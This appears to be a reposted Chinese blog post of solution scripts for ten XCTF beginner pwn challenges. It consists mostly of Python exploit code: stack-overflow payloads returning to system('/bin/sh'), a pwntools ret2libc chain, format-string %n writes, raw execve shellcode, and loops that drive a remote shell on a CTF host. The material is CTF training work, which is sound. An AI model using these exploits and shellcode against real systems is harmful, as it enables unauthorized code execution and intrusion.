XCTF-PWN新手区通关手册

其他 2020-03-11 10:20:16 阅读次数: 0

XCTF-PWN新手区通关手册

题目下载地址:点此下载

1.cgpwn2

import struct
import socket

def p32(value):
	return struct.pack("<I",value)

tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",39143))
payload = b"a" * 0x26 + b'b' * 0x4 + p32(0x8048420) + p32(0) + p32(0x804A080) + b"\n"

print(tcp.recv(1024).decode(),end="")
tcp.send(b"/bin/sh\n")
print(tcp.recv(1024).decode(),end="")
tcp.send(payload)
print(tcp.recv(1024).decode(),end="")
while True:
	cmd = bytes(input("cmd>>"),"utf-8")
	if cmd == b'exit':
		tcp.close()
		exit(0)
	elif cmd == b"":
		continue
	tcp.send(cmd + b'\n')
	print(tcp.recv(1024).decode(),end="")
tcp.close()

2.when_did_you_born

import struct
import socket

def p32(value):
	return struct.pack("<I",value)

tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",38557))
payload = 0x8 * b'a' + p32(1926) + b'\n'
tcp.recv(1024).decode()
tcp.send(b"20\n")
tcp.recv(1024).decode()
tcp.send(payload)
tcp.recv(1024).decode()
print(tcp.recv(1024).decode(),end="")
tcp.close()

3.hello_pwn

import struct
import socket

def p32(value):
	return struct.pack("<I",value)

tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",48442))
payload = b"a" * 4 + p32(0x6E756161) + b"\n"
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.send(payload)
print(tcp.recv(1024).decode(),end="")
tcp.close()

4.level2

import struct
import socket

def p32(value):
	return struct.pack("<I",value)

tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",55086))
payload = 0x88 * b'a' + b'b' * 0x4 + p32(0x8048320) + p32(0) + p32(0x804A024) + b"\n"
print(tcp.recv(1024).decode(),end="")
tcp.send(payload)
while True:
	cmd = bytes(input("cmd>>"),"utf-8")
	if cmd == b'exit':
		tcp.close()
		exit(0)
	elif cmd == b"":
		continue
	tcp.send(cmd + b'\n')
	print(tcp.recv(1024).decode(),end="")
tcp.close()

5.guess_num

import struct
import socket
from ctypes import *

def p32(value):
	return struct.pack("<I",value)
def p64(value):
	return struct.pack("<Q",value)

libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
libc.srand(1)
tmp = []
for i in range(10):
	tmp.append(libc.rand() % 6 + 1)
print(tmp)

tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",49472))
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
payload = 0x20 * b'a' + p64(1) + b'\n' #覆盖随机数种子为1
tcp.send(payload)
print(tcp.recv(1024).decode(),end="")
for i in tmp:
	print(tcp.recv(1024).decode(),end="")
	tcp.send(bytes(str(i),"utf-8") + b'\n')
	print(i)
	print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.close()

6.int_overflow

import struct
import socket
from ctypes import *

def p32(value):
	return struct.pack("<I",value)

payload = 0x14 * b'a' + 0x4 * b'b' + p32(0x804868B)
payload = payload.ljust(260,b'a')
payload += b"\n"
print(payload)

tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",45055))
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.send(b"1\n")
print(tcp.recv(1024).decode(),end="")
tcp.send(b"name\x00")
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.send(payload)
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.close()

7.string

import struct
import socket
import re

def p32(value):
	return struct.pack("<I",value)
def p64(value):
	return struct.pack("<Q",value)

tcp	= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",45072))
print(tcp.recv(1024).decode(),end="")

print(tcp.recv(1024).decode(),end="")
tmp = tcp.recv(2048).decode()
print(tmp)
pattern = re.compile(r'secret\[0\] is (.*?)\n')
addrs = int(pattern.findall(tmp)[0],16)
print(hex(addrs))

tcp.send(b"name\n")
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.send(b"east\n")
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.send(b"1\n")
print(tcp.recv(1024).decode(),end="")
print(tcp.recv(1024).decode(),end="")
tcp.send(bytes(str(addrs),"utf-8") + b'\n')
print(tcp.recv(1024).decode(),end="")
#tcp.send(b'aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n')
tcp.send(b"%85c%7$n\n")
print(tcp.recv(1024).decode(errors="ignore"),end="")
print(tcp.recv(1024).decode(errors="ignore"),end="")
shellcode = b"\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05\n"
tcp.send(shellcode)
while True:
	cmd = bytes(input("cmd>>"),"utf-8")
	if cmd == b'exit':
		tcp.close()
		exit(0)
	elif cmd == b"":
		continue
	tcp.send(cmd + b'\n')
	print(tcp.recv(2048).decode(errors="ignore"),end="")
tcp.close()

8.level3

#coding=utf-8
from pwn import *

def main():
	p = remote("111.198.29.45",31982)
	#p = process("./level3")
	elf = ELF("./level3")
	libc = ELF("./libc_32.so.6")#如果对服务器的程序进行溢出,需要使用题目所提供的libc文件
	write_plt = elf.plt['write']
	__libc_main_addr = elf.got['__libc_start_main']
	main_addr = elf.symbols['main']
	payload = flat(["A" * (0x88 + 4),write_plt,main_addr,1,__libc_main_addr,0xffffffff])
	p.recv()
	p.send(payload)
	__libc_start_main_addr = u32(p.recv()[:4])
	libc_addr = __libc_start_main_addr - libc.symbols['__libc_start_main']
	sys_addr = libc_addr + libc.symbols['system']
	bin_sh_addr = libc_addr + next(libc.search(b"/bin/sh"))
	payload = flat(["A" * (0x88 + 4),sys_addr,0xffffffff,bin_sh_addr])
	#p.recv()
	p.send(payload)
	p.interactive()

if __name__ == '__main__':
	main()

9.get_shell

import struct
import socket
tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",55206))
while True:
	cmd = bytes(input("cmd>>"),"utf-8")
	if cmd == b'exit':
		tcp.close()
		exit(0)
	elif cmd == b"":
		continue
	tcp.send(cmd + b'\n')
	print(tcp.recv(1024).decode(errors="ignore"),end="")

10.CGfsb

import struct
import socket

def p32(value):
	return struct.pack("<I",value)
	
tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp.connect(("111.198.29.45",39932))
print(tcp.recv(1024).decode(errors="ignore"),end="")
tcp.send(b"bbbb\n")
print(tcp.recv(1024).decode(errors="ignore"),end="")
print(tcp.recv(1024).decode(errors="ignore"),end="")
payload = p32(0x804A068) + b"aaaa" + b"%10$n" + b'\n'
tcp.send(payload)
print(tcp.recv(1024).decode(errors="ignore"),end="")
print(tcp.recv(1024).decode(errors="ignore"),end="")
tcp.close()
夏了茶糜
发布了9 篇原创文章 · 获赞 3 · 访问量 241
私信 关注

猜你喜欢

转载自blog.csdn.net/qin9800/article/details/104689518
今日推荐
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
GCC 14.1 发布
面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」
开源日报 | 谷歌扶持鸿蒙上位;开源Rabbit R1;Docker加持的安卓手机;微软的焦虑和野心;海尔电器把开放平台关了
中国码农的“35岁魔咒”
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
周排行
基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型
JS实现无缝滚动上
深入解析HashMap原理(基于JDK1.8)
mysql的连接池
关于.htc
linux下的ubuntu12.04图形界面
【数论】好推不好记的扩展欧几里德
设备树详解
cscope + tags 简单设置
xml学习
每日归档
更多
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022